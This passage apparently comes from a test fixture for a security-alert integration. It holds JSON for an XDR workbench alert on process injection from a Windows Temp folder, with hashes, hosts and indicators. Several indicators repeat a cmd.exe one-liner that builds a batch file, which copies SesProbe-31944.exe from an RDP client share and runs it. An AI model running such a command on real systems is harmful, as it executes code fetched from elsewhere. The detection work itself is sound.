\"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": \"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", 
\"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": 
\"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", 
\"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": 
[\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": 
[\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": 
\"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", 
\"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": [\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], 
\"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": 
\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 
4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", 
\"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": 
[\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": 